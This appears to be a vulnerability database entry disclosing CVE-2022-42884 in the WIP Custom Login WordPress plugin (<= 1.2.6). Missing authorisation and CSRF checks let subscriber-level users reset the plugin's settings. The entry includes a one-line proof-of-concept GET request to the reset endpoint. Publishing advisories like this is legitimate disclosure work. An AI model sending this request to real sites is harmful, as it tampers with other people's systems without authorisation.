WordPress WIP Custom Login Plugin by ThemeinProgress

WordPress WIP Custom Login Plugin by ThemeinProgress <= 1.2.6 - Subscriber+ Reset Settings

LANACOMMONVDB ID: 15934778-1045-4f3c-bcaf-1bbd32aceff3

The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check when reseting plugin settings, which could allow authenticated users to reset them.

Proof of Concept

GET /wp-admin/admin.php?page=wip_custom_login_panel&tab=Import_Export&action=wip_custom_login_backup_reset HTTP/1.1
Host: localhost

References

Source Code: https://wordpress.org/plugins/wip-custom-login/

CVE: CVE-2022-42884

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-01

Published: 2022-10-24

Affected Version: <= 1.2.6

Classification

Type: Broken Access Control, Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]